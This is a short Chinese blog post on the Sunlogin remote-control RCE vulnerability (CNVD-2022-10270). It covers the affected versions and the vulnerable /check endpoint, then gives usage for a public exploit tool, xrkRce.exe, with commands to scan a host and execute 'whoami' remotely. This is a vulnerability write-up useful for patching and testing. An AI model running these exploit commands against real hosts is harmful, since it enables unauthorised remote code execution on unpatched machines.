向日葵介绍

 

向日葵远程控制软件是一款免费的集远程控制桌面,远程开机,远程管理,支持内网穿透的一体化远程控制管理软件

 

漏洞介绍

 

向日葵远程控制是上海贝锐信息科技的一款提供远程控制服务的国产软件,CNVD-2022-10270/CNVD-2022-03672,漏洞是二月十六号发现,官方于二月二十多号修复的

 

漏洞原理

 

向日葵client在windows运行时,会连接远程Oray的服务器,开放对外接口,接口统一由sunlogin 处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check 处,当cmd的值为ping/nslookup开头时触发

 

漏洞版本

  • 向日葵个人版 for Windows <= V11.0.0.33
  • 向日葵简约版 <= V1.0.1.43315(2021.12)

 

工具介绍

 

工具来源:https://github.com/Mr-xn/sunlogin_rce

 

测试xrkRce.exe

 

xrkRce.exe

-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令
xrkRce.exe -h 192.168.1.5 -t scan -p 1-65535

xrkRce.exe -h 192.168.1.5 -t rce -p 扫描出来的端口 -c "whoami"  执行命令

发表回复

后才能评论

本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。

最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。 若排除这种情况,可在对应资源底部留言,或联络我们。

对于会员专享、整站源码、程序插件、网站模板、网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。

如果您已经成功付款但是网站没有弹出成功提示,请联系站长提供付款信息为您处理

源码素材属于虚拟商品,具有可复制性,可传播性,一旦授予,不接受任何形式的退款、换货要求。请您在购买获取之前确认好 是您所需要的资源

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。